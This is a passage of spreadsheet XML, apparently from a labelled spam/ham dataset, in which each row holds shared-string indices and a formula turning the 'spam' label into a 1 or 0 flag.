    <row r="4675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4675" t="s">
        <v>9661</v>
      </c>
      <c r="B4675" t="s">
        <v>5294</v>
      </c>
      <c r="C4675" s="1">
        <f>IF(B4675="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4676" t="s">
        <v>9662</v>
      </c>
      <c r="B4676" t="s">
        <v>5297</v>
      </c>
      <c r="C4676" s="1">
        <f>IF(B4676="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4677" t="s">
        <v>9663</v>
      </c>
      <c r="B4677" t="s">
        <v>5294</v>
      </c>
      <c r="C4677" s="1">
        <f>IF(B4677="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4678" t="s">
        <v>9664</v>
      </c>
      <c r="B4678" t="s">
        <v>5294</v>
      </c>
      <c r="C4678" s="1">
        <f>IF(B4678="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4679" t="s">
        <v>9665</v>
      </c>
      <c r="B4679" t="s">
        <v>5294</v>
      </c>
      <c r="C4679" s="1">
        <f>IF(B4679="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4680" t="s">
        <v>9666</v>
      </c>
      <c r="B4680" t="s">
        <v>5294</v>
      </c>
      <c r="C4680" s="1">
        <f>IF(B4680="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4681" t="s">
        <v>9667</v>
      </c>
      <c r="B4681" t="s">
        <v>5294</v>
      </c>
      <c r="C4681" s="1">
        <f>IF(B4681="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4682" t="s">
        <v>9668</v>
      </c>
      <c r="B4682" t="s">
        <v>5294</v>
      </c>
      <c r="C4682" s="1">
        <f>IF(B4682="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4683" t="s">
        <v>9669</v>
      </c>
      <c r="B4683" t="s">
        <v>5294</v>
      </c>
      <c r="C4683" s="1">
        <f>IF(B4683="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4684" t="s">
        <v>9670</v>
      </c>
      <c r="B4684" t="s">
        <v>5294</v>
      </c>
      <c r="C4684" s="1">
        <f>IF(B4684="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4685" t="s">
        <v>5580</v>
      </c>
      <c r="B4685" t="s">
        <v>5294</v>
      </c>
      <c r="C4685" s="1">
        <f>IF(B4685="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4686" t="s">
        <v>9671</v>
      </c>
      <c r="B4686" t="s">
        <v>5294</v>
      </c>
      <c r="C4686" s="1">
        <f>IF(B4686="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4687" t="s">
        <v>9672</v>
      </c>
      <c r="B4687" t="s">
        <v>5294</v>
      </c>
      <c r="C4687" s="1">
        <f>IF(B4687="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4688" t="s">
        <v>9673</v>
      </c>
      <c r="B4688" t="s">
        <v>5294</v>
      </c>
      <c r="C4688" s="1">
        <f>IF(B4688="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4689" t="s">
        <v>9674</v>
      </c>
      <c r="B4689" t="s">
        <v>5294</v>
      </c>
      <c r="C4689" s="1">
        <f>IF(B4689="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4690" t="s">
        <v>9675</v>
      </c>
      <c r="B4690" t="s">
        <v>5294</v>
      </c>
      <c r="C4690" s="1">
        <f>IF(B4690="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4691" t="s">
        <v>9676</v>
      </c>
      <c r="B4691" t="s">
        <v>5294</v>
      </c>
      <c r="C4691" s="1">
        <f>IF(B4691="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4692" t="s">
        <v>9677</v>
      </c>
      <c r="B4692" t="s">
        <v>5294</v>
      </c>
      <c r="C4692" s="1">
        <f>IF(B4692="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4693" t="s">
        <v>9678</v>
      </c>
      <c r="B4693" t="s">
        <v>5294</v>
      </c>
      <c r="C4693" s="1">
        <f>IF(B4693="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4694" t="s">
        <v>7343</v>
      </c>
      <c r="B4694" t="s">
        <v>5294</v>
      </c>
      <c r="C4694" s="1">
        <f>IF(B4694="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4695" t="s">
        <v>9679</v>
      </c>
      <c r="B4695" t="s">
        <v>5294</v>
      </c>
      <c r="C4695" s="1">
        <f>IF(B4695="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4696" t="s">
        <v>9680</v>
      </c>
      <c r="B4696" t="s">
        <v>5297</v>
      </c>
      <c r="C4696" s="1">
        <f>IF(B4696="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4697" t="s">
        <v>9681</v>
      </c>
      <c r="B4697" t="s">
        <v>5294</v>
      </c>
      <c r="C4697" s="1">
        <f>IF(B4697="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4698" t="s">
        <v>9682</v>
      </c>
      <c r="B4698" t="s">
        <v>5294</v>
      </c>
      <c r="C4698" s="1">
        <f>IF(B4698="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4699" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4699" t="s">
        <v>6750</v>
      </c>
      <c r="B4699" t="s">
        <v>5294</v>
      </c>
      <c r="C4699" s="1">
        <f>IF(B4699="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4700" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4700" t="s">
        <v>9683</v>
      </c>
      <c r="B4700" t="s">
        <v>5294</v>
      </c>
      <c r="C4700" s="1">
        <f>IF(B4700="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4701" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4701" t="s">
        <v>7028</v>
      </c>
      <c r="B4701" t="s">
        <v>5297</v>
      </c>
      <c r="C4701" s="1">
        <f>IF(B4701="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4702" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4702" t="s">
        <v>9684</v>
      </c>
      <c r="B4702" t="s">
        <v>5294</v>
      </c>
      <c r="C4702" s="1">
        <f>IF(B4702="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4703" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4703" t="s">
        <v>9685</v>
      </c>
      <c r="B4703" t="s">
        <v>5294</v>
      </c>
      <c r="C4703" s="1">
        <f>IF(B4703="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4704" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4704" t="s">
        <v>9686</v>
      </c>
      <c r="B4704" t="s">
        <v>5294</v>
      </c>
      <c r="C4704" s="1">
        <f>IF(B4704="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4705" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4705" t="s">
        <v>9687</v>
      </c>
      <c r="B4705" t="s">
        <v>5294</v>
      </c>
      <c r="C4705" s="1">
        <f>IF(B4705="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4706" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4706" t="s">
        <v>9688</v>
      </c>
      <c r="B4706" t="s">
        <v>5294</v>
      </c>
      <c r="C4706" s="1">
        <f>IF(B4706="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4707" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4707" t="s">
        <v>9689</v>
      </c>
      <c r="B4707" t="s">
        <v>5294</v>
      </c>
      <c r="C4707" s="1">
        <f>IF(B4707="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4708" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4708" t="s">
        <v>9690</v>
      </c>
      <c r="B4708" t="s">
        <v>5294</v>
      </c>
      <c r="C4708" s="1">
        <f>IF(B4708="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4709" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4709" t="s">
        <v>9691</v>
      </c>
      <c r="B4709" t="s">
        <v>5294</v>
      </c>
      <c r="C4709" s="1">
        <f>IF(B4709="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4710" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4710" t="s">
        <v>9692</v>
      </c>
      <c r="B4710" t="s">
        <v>5294</v>
      </c>
      <c r="C4710" s="1">
        <f>IF(B4710="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4711" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4711" t="s">
        <v>9693</v>
      </c>
      <c r="B4711" t="s">
        <v>5294</v>
      </c>
      <c r="C4711" s="1">
        <f>IF(B4711="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4712" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4712" t="s">
        <v>9694</v>
      </c>
      <c r="B4712" t="s">
        <v>5294</v>
      </c>
      <c r="C4712" s="1">
        <f>IF(B4712="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4713" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4713" t="s">
        <v>9695</v>
      </c>
      <c r="B4713" t="s">
        <v>5294</v>
      </c>
      <c r="C4713" s="1">
        <f>IF(B4713="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4714" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4714" t="s">
        <v>9696</v>
      </c>
      <c r="B4714" t="s">
        <v>5294</v>
      </c>
      <c r="C4714" s="1">
        <f>IF(B4714="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4715" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4715" t="s">
        <v>9697</v>
      </c>
      <c r="B4715" t="s">
        <v>5294</v>
      </c>
      <c r="C4715" s="1">
        <f>IF(B4715="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4716" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4716" t="s">
        <v>9698</v>
      </c>
      <c r="B4716" t="s">
        <v>5294</v>
      </c>
      <c r="C4716" s="1">
        <f>IF(B4716="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4717" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4717" t="s">
        <v>9699</v>
      </c>
      <c r="B4717" t="s">
        <v>5294</v>
      </c>
      <c r="C4717" s="1">
        <f>IF(B4717="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4718" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4718" t="s">
        <v>9700</v>
      </c>
      <c r="B4718" t="s">
        <v>5294</v>
      </c>
      <c r="C4718" s="1">
        <f>IF(B4718="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4719" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4719" t="s">
        <v>7019</v>
      </c>
      <c r="B4719" t="s">
        <v>5294</v>
      </c>
      <c r="C4719" s="1">
        <f>IF(B4719="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4720" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4720" t="s">
        <v>9701</v>
      </c>
      <c r="B4720" t="s">
        <v>5294</v>
      </c>
      <c r="C4720" s="1">
        <f>IF(B4720="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4721" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4721" t="s">
        <v>9702</v>
      </c>
      <c r="B4721" t="s">
        <v>5294</v>
      </c>
      <c r="C4721" s="1">
        <f>IF(B4721="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4722" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4722" t="s">
        <v>9703</v>
      </c>
      <c r="B4722" t="s">
        <v>5294</v>
      </c>
      <c r="C4722" s="1">
        <f>IF(B4722="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4723" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4723" t="s">
        <v>9704</v>
      </c>
      <c r="B4723" t="s">
        <v>5294</v>
      </c>
      <c r="C4723" s="1">
        <f>IF(B4723="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4724" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4724" t="s">
        <v>9705</v>
      </c>
      <c r="B4724" t="s">
        <v>5294</v>
      </c>
      <c r="C4724" s="1">
        <f>IF(B4724="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4725" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4725" t="s">
        <v>9706</v>
      </c>
      <c r="B4725" t="s">
        <v>5297</v>
      </c>
      <c r="C4725" s="1">
        <f>IF(B4725="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4726" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4726" t="s">
        <v>9707</v>
      </c>
      <c r="B4726" t="s">
        <v>5294</v>
      </c>
      <c r="C4726" s="1">
        <f>IF(B4726="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4727" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4727" t="s">
        <v>9708</v>
      </c>
      <c r="B4727" t="s">
        <v>5294</v>
      </c>
      <c r="C4727" s="1">
        <f>IF(B4727="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4728" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4728" t="s">
        <v>9709</v>
      </c>
      <c r="B4728" t="s">
        <v>5297</v>
      </c>
      <c r="C4728" s="1">
        <f>IF(B4728="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4729" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4729" t="s">
        <v>9710</v>
      </c>
      <c r="B4729" t="s">
        <v>5294</v>
      </c>
      <c r="C4729" s="1">
        <f>IF(B4729="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4730" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4730" t="s">
        <v>9711</v>
      </c>
      <c r="B4730" t="s">
        <v>5294</v>
      </c>
      <c r="C4730" s="1">
        <f>IF(B4730="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4731" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4731" t="s">
        <v>9712</v>
      </c>
      <c r="B4731" t="s">
        <v>5294</v>
      </c>
      <c r="C4731" s="1">
        <f>IF(B4731="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4732" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4732" t="s">
        <v>9713</v>
      </c>
      <c r="B4732" t="s">
        <v>5294</v>
      </c>
      <c r="C4732" s="1">
        <f>IF(B4732="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4733" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4733" t="s">
        <v>9714</v>
      </c>
      <c r="B4733" t="s">
        <v>5294</v>
      </c>
      <c r="C4733" s="1">
        <f>IF(B4733="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4734" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4734" t="s">
        <v>9715</v>
      </c>
      <c r="B4734" t="s">
        <v>5294</v>
      </c>
      <c r="C4734" s="1">
        <f>IF(B4734="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4735" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4735" t="s">
        <v>7016</v>
      </c>
      <c r="B4735" t="s">
        <v>5297</v>
      </c>
      <c r="C4735" s="1">
        <f>IF(B4735="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4736" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4736" t="s">
        <v>9716</v>
      </c>
      <c r="B4736" t="s">
        <v>5294</v>
      </c>
      <c r="C4736" s="1">
        <f>IF(B4736="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4737" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4737" t="s">
        <v>9717</v>
      </c>
      <c r="B4737" t="s">
        <v>5294</v>
      </c>
      <c r="C4737" s="1">
        <f>IF(B4737="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4738" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4738" t="s">
        <v>9718</v>
      </c>
      <c r="B4738" t="s">
        <v>5294</v>
      </c>
      <c r="C4738" s="1">
        <f>IF(B4738="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4739" t="s">
        <v>9719</v>
      </c>
      <c r="B4739" t="s">
        <v>5294</v>
      </c>
      <c r="C4739" s="1">
        <f>IF(B4739="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4740" t="s">
        <v>9720</v>
      </c>
      <c r="B4740" t="s">
        <v>5294</v>
      </c>
      <c r="C4740" s="1">
        <f>IF(B4740="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4741" t="s">
        <v>9721</v>
      </c>
      <c r="B4741" t="s">
        <v>5294</v>
      </c>
      <c r="C4741" s="1">
        <f>IF(B4741="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4742" t="s">
        <v>9722</v>
      </c>
      <c r="B4742" t="s">
        <v>5294</v>
      </c>
      <c r="C4742" s="1">
        <f>IF(B4742="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4743" t="s">
        <v>5930</v>
      </c>
      <c r="B4743" t="s">
        <v>5294</v>
      </c>
      <c r="C4743" s="1">
        <f>IF(B4743="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4744" t="s">
        <v>9556</v>
      </c>
      <c r="B4744" t="s">
        <v>5294</v>
      </c>
      <c r="C4744" s="1">
        <f>IF(B4744="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4745" t="s">
        <v>9723</v>
      </c>
      <c r="B4745" t="s">
        <v>5294</v>
      </c>
      <c r="C4745" s="1">
        <f>IF(B4745="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4746" t="s">
        <v>8538</v>
      </c>
      <c r="B4746" t="s">
        <v>5297</v>
      </c>
      <c r="C4746" s="1">
        <f>IF(B4746="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4747" t="s">
        <v>9724</v>
      </c>
      <c r="B4747" t="s">
        <v>5294</v>
      </c>
      <c r="C4747" s="1">
        <f>IF(B4747="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4748" t="s">
        <v>9725</v>
      </c>
      <c r="B4748" t="s">
        <v>5294</v>
      </c>
      <c r="C4748" s="1">
        <f>IF(B4748="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4749" t="s">
        <v>9726</v>
      </c>
      <c r="B4749" t="s">
        <v>5294</v>
      </c>
      <c r="C4749" s="1">
        <f>IF(B4749="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4750" t="s">
        <v>9727</v>
      </c>
      <c r="B4750" t="s">
        <v>5294</v>
      </c>
      <c r="C4750" s="1">
        <f>IF(B4750="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4751" t="s">
        <v>9728</v>
      </c>
      <c r="B4751" t="s">
        <v>5294</v>
      </c>
      <c r="C4751" s="1">
        <f>IF(B4751="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4752" t="s">
        <v>9729</v>
      </c>
      <c r="B4752" t="s">
        <v>5297</v>
      </c>
      <c r="C4752" s="1">
        <f>IF(B4752="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4753" t="s">
        <v>9730</v>
      </c>
      <c r="B4753" t="s">
        <v>5294</v>
      </c>
      <c r="C4753" s="1">
        <f>IF(B4753="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4754" t="s">
        <v>9731</v>
      </c>
      <c r="B4754" t="s">
        <v>5297</v>
      </c>
      <c r="C4754" s="1">
        <f>IF(B4754="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4755" t="s">
        <v>9732</v>
      </c>
      <c r="B4755" t="s">
        <v>5294</v>
      </c>
      <c r="C4755" s="1">
        <f>IF(B4755="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4756" t="s">
        <v>9733</v>
      </c>
      <c r="B4756" t="s">
        <v>5294</v>
      </c>
      <c r="C4756" s="1">
        <f>IF(B4756="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4757" t="s">
        <v>9734</v>
      </c>
      <c r="B4757" t="s">
        <v>5294</v>
      </c>
      <c r="C4757" s="1">
        <f>IF(B4757="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4758" t="s">
        <v>9735</v>
      </c>
      <c r="B4758" t="s">
        <v>5294</v>
      </c>
      <c r="C4758" s="1">
        <f>IF(B4758="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4759" t="s">
        <v>6842</v>
      </c>
      <c r="B4759" t="s">
        <v>5297</v>
      </c>
      <c r="C4759" s="1">
        <f>IF(B4759="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4760" t="s">
        <v>9736</v>
      </c>
      <c r="B4760" t="s">
        <v>5297</v>
      </c>
      <c r="C4760" s="1">
        <f>IF(B4760="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4761" t="s">
        <v>9737</v>
      </c>
      <c r="B4761" t="s">
        <v>5294</v>
      </c>
      <c r="C4761" s="1">
        <f>IF(B4761="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4762" t="s">
        <v>9738</v>
      </c>
      <c r="B4762" t="s">
        <v>5294</v>
      </c>
      <c r="C4762" s="1">
        <f>IF(B4762="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4763" t="s">
        <v>9739</v>
      </c>
      <c r="B4763" t="s">
        <v>5294</v>
      </c>
      <c r="C4763" s="1">
        <f>IF(B4763="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4764" t="s">
        <v>9740</v>
      </c>
      <c r="B4764" t="s">
        <v>5294</v>
      </c>
      <c r="C4764" s="1">
        <f>IF(B4764="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4765" t="s">
        <v>9741</v>
      </c>
      <c r="B4765" t="s">
        <v>5294</v>
      </c>
      <c r="C4765" s="1">
        <f>IF(B4765="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4766" t="s">
        <v>9742</v>
      </c>
      <c r="B4766" t="s">
        <v>5294</v>
      </c>
      <c r="C4766" s="1">
        <f>IF(B4766="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4767" t="s">
        <v>9743</v>
      </c>
      <c r="B4767" t="s">
        <v>5294</v>
      </c>
      <c r="C4767" s="1">
        <f>IF(B4767="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4768" t="s">
        <v>9744</v>
      </c>
      <c r="B4768" t="s">
        <v>5297</v>
      </c>
      <c r="C4768" s="1">
        <f>IF(B4768="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4769" t="s">
        <v>9745</v>
      </c>
      <c r="B4769" t="s">
        <v>5294</v>
      </c>
      <c r="C4769" s="1">
        <f>IF(B4769="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4770" t="s">
        <v>9746</v>
      </c>
      <c r="B4770" t="s">
        <v>5294</v>
      </c>
      <c r="C4770" s="1">
        <f>IF(B4770="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4771" t="s">
        <v>9747</v>
      </c>
      <c r="B4771" t="s">
        <v>5294</v>
      </c>
      <c r="C4771" s="1">
        <f>IF(B4771="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4772" t="s">
        <v>9748</v>
      </c>
      <c r="B4772" t="s">
        <v>5294</v>
      </c>
      <c r="C4772" s="1">
        <f>IF(B4772="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4773" t="s">
        <v>7576</v>
      </c>
      <c r="B4773" t="s">
        <v>5294</v>
      </c>
      <c r="C4773" s="1">
        <f>IF(B4773="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4774" t="s">
        <v>9749</v>
      </c>
      <c r="B4774" t="s">
        <v>5294</v>
      </c>
      <c r="C4774" s="1">
        <f>IF(B4774="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4775" t="s">
        <v>9750</v>
      </c>
      <c r="B4775" t="s">
        <v>5294</v>
      </c>
      <c r="C4775" s="1">
        <f>IF(B4775="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4776" t="s">
        <v>6922</v>
      </c>
      <c r="B4776" t="s">
        <v>5294</v>
      </c>
      <c r="C4776" s="1">
        <f>IF(B4776="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4777" t="s">
        <v>9751</v>
      </c>
      <c r="B4777" t="s">
        <v>5294</v>
      </c>
      <c r="C4777" s="1">
        <f>IF(B4777="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4778" t="s">
        <v>9752</v>
      </c>
      <c r="B4778" t="s">
        <v>5294</v>
      </c>
      <c r="C4778" s="1">
        <f>IF(B4778="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
